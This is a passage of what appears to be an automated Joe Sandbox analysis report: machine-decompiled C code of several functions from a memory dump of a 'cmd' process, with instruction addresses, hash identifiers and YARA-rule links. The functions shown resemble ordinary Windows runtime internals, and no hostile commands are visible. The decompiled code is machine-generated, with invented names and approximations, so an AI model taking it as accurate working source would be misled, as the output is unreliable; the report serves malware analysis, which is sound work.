							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x37b6110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x37b6110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}

0x037920a8
0x037920b0
0x037920b6
0x037920ba
0x037920be
0x037920c4
0x037920cb
0x037920db
0x037920e4
0x037920e7
0x037920e9
0x037920ef
0x037920f1
0x037920fe
0x03792102
0x03792105
0x03792105
0x03792107
0x0379210d
0x03792112
0x03792115
0x03792120
0x03792120
0x03792107
0x03792126
0x03792131
0x03792133
0x0379213e
0x0379213e
0x03792140
0x03792146
0x0379214b
0x03792156
0x03792156
0x03792140
0x0379215f
0x03792165
0x03792170
0x03792172
0x0379217d
0x0379217d
0x0379217f
0x03792185
0x03792192
0x03792192
0x0379217f
0x03792170
0x03792197
0x03792199
0x037921a1
0x037921b1
0x037921bf
0x037921d6
0x037921d6
0x037921bf
0x037921dd
0x037921e5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583ccddeacd45b7bc67214d56851200b032b45e93f9afb98ff47254e26f11351
Instruction ID: 21475d704b5d56c33607e9c9e3ad665816bd489f9040326cf5a4da07edce3da7
Opcode Fuzzy Hash: 583ccddeacd45b7bc67214d56851200b032b45e93f9afb98ff47254e26f11351
Instruction Fuzzy Hash: C941E233E0002E9BCF18DF68D481979F3B6FB4830075646BED905AB286EB34AD11C780

Uniqueness

Uniqueness Score: -1.00%

Function 03792D07 Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E03792D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E037921E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x36aac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x36aac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x36aac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x36aac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x36aac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x36aac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x37b6110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x37b6110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x37b6110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E036DB090(_v24, _t91, _v12, _t29);
			}

0x03792d1f
0x03792d2c
0x03792d31
0x03792d33
0x03792d42
0x03792d4b
0x03792d51
0x03792d5d
0x03792d62
0x03792d6e
0x03792d71
0x03792d7d
0x03792d87
0x03792d8d
0x03792d91
0x03792da5
0x03792db7
0x03792dc8
0x03792dcf
0x03792dd1
0x03792dd3
0x03792dd6
0x03792ddb
0x03792ddd
0x00000000
0x03792ddf
0x03792df5
0x03792e0e
0x03792e12
0x03792e1a
0x03792e1c
0x00000000
0x00000000
0x00000000
0x00000000
0x03792e14
0x03792e16
0x03792e22
0x03792e22
0x03792e18
0x03792e18
0x00000000
0x03792e18
0x03792e16
0x03792df7
0x03792df7
0x03792dfc
0x03792e04
0x03792e06
0x03792e1e
0x03792e1e
0x00000000
0x00000000
0x00000000
0x00000000
0x03792dfe
0x03792e00
0x03792e08
0x03792e08
0x03792e02
0x03792e02
0x00000000
0x03792e02
0x03792e00
0x03792dfc
0x00000000
0x03792df5
0x03792ddf
0x03792e26
0x03792e26
0x03792e3c

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa354d90ebb82c5ed9aa410ab170c9629aacca37f7b9dbd2c3dab8f809ee4de8
Instruction ID: 7c362571845370a3967fbe9fbb97eba341521067aa3134c642b5de89a5cc7950
Opcode Fuzzy Hash: aa354d90ebb82c5ed9aa410ab170c9629aacca37f7b9dbd2c3dab8f809ee4de8
Instruction Fuzzy Hash: 81414C715041596FDB41DB69D4D46BABFF5EF4A201B0D82EBD882DB243DA38C506C770

Uniqueness

Uniqueness Score: -1.00%

Function 0378EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0378EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E036E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0378E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E036CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E036DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0378AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0378BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E036E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0377FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E036DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0378A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0378ea55
0x0378ea66
0x0378ea68
0x0378ea6c
0x0378ea6f
0x0378ea72
0x0378ea75
0x0378ea7a
0x0378ea7a
0x0378ea7e
0x0378ea80
0x0378ea85
0x0378ea8b
0x0378eab5
0x0378eabc
0x0378eabf
0x0378eabf
0x0378eaca
0x0378eace
0x0378ead0
0x0378eae4
0x0378eaeb
0x0378eaf0
0x0378eaf5
0x0378eb09
0x0378eb0d
0x0378eb1d
0x0378eb2d
0x0378eb38
0x0378eb3d
0x0378eb41
0x0378eb4a
0x0378eb60
0x0378eb4c
0x0378eb52
0x0378eb59
0x0378eb59
0x0378eb68
0x0378eb71
0x0378eb71
0x0378ea8d
0x0378ea8f
0x0378ea92
0x0378ea97
0x0378ea97
0x0378ea9b
0x0378ea9c
0x0378ea9e
0x0378eaa6
0x0378eaa6
0x0378eb7e

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 8de0b0885e733eb16293377e758469a4e4436bdb57e92cdd9596a6fa49b49f57
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 343181766447059BC719EF28CC84A6BB7AAFFC4610F08492DE5568B640DB34E809CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 037469A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E037469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x37bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L036D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03746BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03709980() >= 0) {
							E036E2280(_t56, 0x37b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x37b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x37b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E036CB6F0(0x36ac338, 0x36ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03709520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E037095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E036DFFB0(_t68, _t77, 0x37b8778);
				}
				_pop(_t78);
				return E0370B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x037469b5
0x037469be
0x037469c3
0x037469c9
0x037469cc
0x037469d1
0x037469d3
0x037469de
0x037469e1
0x037469ea
0x037469f6
0x037469fe
0x03746a13
0x03746a14
0x03746a15
0x03746a16
0x03746a1e
0x03746a26
0x03746a31
0x03746a36
0x03746a37
0x03746a40
0x03746a49
0x03746a4a
0x03746a53
0x03746a59
0x03746a5d
0x03746a5e
0x03746a64
0x03746a67
0x03746a6a
0x03746a6d
0x03746a70
0x03746a77
0x03746a7d
0x03746a86
0x03746a89
0x03746a9c
0x03746a9f
0x03746aa2
0x03746aa5
0x03746aaf
0x03746ab1
0x03746ab8
0x03746ab9
0x03746abb
0x03746abe
0x03746ac5
0x03746ac5
0x03746aaf
0x03746a40
0x03746a26
0x037469fe
0x03746ace
0x03746ad0
0x03746ad3
0x03746ad8
0x03746adf
0x03746adf
0x03746ae8
0x03746aef
0x03746aef
0x03746af9
0x03746b06

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ed86b391852615cacb58455836de6e6a75f72225ea2fbdbc98d9492ba93091
Instruction ID: 92b5b57a7a49930fb8fe5d712c7deac8aa02e51c05ef13a45fc54d0bdf177ae9
Opcode Fuzzy Hash: b7ed86b391852615cacb58455836de6e6a75f72225ea2fbdbc98d9492ba93091
Instruction Fuzzy Hash: 0C416AB5E00708AFDB14DFA5C880BEEBBF8EF49714F18812AE914A7251DB74A905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 036C5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E036C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E036C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E037095D0();
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E036DEB70(_t54, 0x37b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E037095D0();
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E036DEB70(_t54, 0x37b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0370F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E036DEB70(_t54, 0x37b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E037095D0();
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x036c5220
0x036c5224
0x03720d13
0x03720d16
0x03720d19
0x036c522a
0x036c522a
0x036c522d
0x036c522d
0x036c5231
0x036c5235
0x036c5239
0x03720d5c
0x03720d62
0x00000000
0x00000000
0x03720d6a
0x03720d7b
0x03720d7f
0x03720d81
0x03720d84
0x03720d95
0x03720d95
0x03720d6c
0x03720d71
0x03720d71
0x03720d9a
0x00000000
0x036c524a
0x036c524a
0x036c5250
0x03720d24
0x03720d35
0x03720d39
0x03720d3b
0x03720d3e
0x03720d50
0x03720d50
0x03720d26
0x03720d2b
0x03720d2b
0x00000000
0x03720d55
0x036c5256
0x036c525b
0x036c5265
0x03720da7
0x036c526b
0x036c526e
0x036c5272
0x03720db1
0x03720db4
0x03720dc5
0x03720dc5
0x036c5272
0x036c5278
0x036c527e
0x036c528a
0x036c528c
0x036c528d
0x00000000
0x036c5280
0x036c5282
0x036c5288
0x036c529f
0x036c5292
0x00000000
0x036c5292
0x00000000
0x036c5288
0x036c527e

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1abc28a5e961bf884d1e5306d859f3c5ed6034b3617294d29751cb21416544b9
Instruction ID: 4aae91bf18aa9ec5e16d7eb353de1ee7ad7a1fb6cbdb3bfaabb207615957c952
Opcode Fuzzy Hash: 1abc28a5e961bf884d1e5306d859f3c5ed6034b3617294d29751cb21416544b9
Instruction Fuzzy Hash: 04310131652760EBC725EB29CD80B7ABBB5FF01760F14461EE9561F2E1DB60F800C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 036FA61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E036FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x37a0220);
				E0371D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x37b7b9c; // 0x0
				_t55 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0371D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x37b7b10 =  *0x37b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x37b536c; // 0x2f12f88
					if( *_t51 != 0x37b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x37b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x37b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E036FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x036fa61c
0x036fa61e
0x036fa623
0x036fa628
0x036fa62b
0x036fa62d
0x036fa648
0x036fa64a
0x036fa64f
0x03739b44
0x036fa6ec
0x036fa6f1
0x036fa6f1
0x036fa655
0x036fa657
0x036fa65a
0x036fa65d
0x036fa662
0x036fa663
0x036fa667
0x036fa668
0x036fa66d
0x036fa706
0x036fa706
0x03739bda
0x03739be6
0x03739beb
0x00000000
0x03739beb
0x036fa679
0x03739b7a
0x00000000
0x03739b7a
0x036fa683
0x036fa6f4
0x036fa6f7
0x036fa6f9
0x036fa6fd
0x036fa6a0
0x036fa6a0
0x036fa6ad
0x036fa6af
0x036fa6b4
0x03739ba7
0x03739bac
0x00000000
0x00000000
0x03739bc6
0x03739bce
0x03739bd1
0x03739bd3
0x03739bd3
0x00000000
0x03739bd1
0x036fa6bd
0x036fa6c3
0x036fa6c6
0x036fa6d2
0x036fa701
0x036fa704
0x00000000
0x036fa704
0x036fa6d4
0x036fa6d6
0x036fa6d9
0x036fa6db
0x036fa6e1
0x036fa6e6
0x036fa6e8
0x036fa6e8
0x036fa6ea
0x00000000
0x036fa6ea
0x036fa688
0x036fa692
0x036fa694
0x036fa699
0x00000000
0x00000000
0x036fa69d
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1c2988e11043ccb54b03521ed19adcac0e52743e9381c33015d6b342f5d80a
Instruction ID: c7f791d7386197bc4d648ea5fc5ab5d70d54f71fcbfbf346b26fe671c10b22de
Opcode Fuzzy Hash: 3c1c2988e11043ccb54b03521ed19adcac0e52743e9381c33015d6b342f5d80a
Instruction Fuzzy Hash: 51415B79A00205DFCB19CF98C890B99BBF1BF4A314F19C1A9E908AF345D775A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 03703D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03703D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E036D7B60(0, _t61, 0x36a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E036D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L036E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03703d4c
0x03703d50
0x03703d55
0x03703d5e
0x0373e79a
0x00000000
0x0373e79a
0x03703d68
0x0373e789
0x03703d9d
0x03703da3
0x03703daf
0x03703db5
0x03703dbc
0x03703dc4
0x03703dc9
0x03703dce
0x0373e7ae
0x0373e7ae
0x03703dde
0x03703de2
0x03703de7
0x03703e0d
0x03703e13
0x03703e16
0x03703e1e
0x03703e25
0x03703e28
0x00000000
0x00000000
0x03703e2a
0x03703e2f
0x03703e37
0x03703e37
0x00000000
0x03703e37
0x03703e31
0x00000000
0x03703e31
0x03703e20
0x03703e20
0x03703e35
0x00000000
0x03703de9
0x03703de9
0x03703de9
0x03703dee
0x03703dfd
0x03703dff
0x03703e02
0x03703e05
0x03703e05
0x00000000
0x03703df0
0x03703de7
0x0373e78f
0x0373e794
0x03703d79
0x03703d84
0x03703d89
0x03703d8e
0x00000000
0x0373e7a4
0x03703d96
0x03703d9a
0x00000000
0x03703d9a
0x00000000
0x0373e794
0x03703d6e
0x03703d73
0x00000000
0x0373e7b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
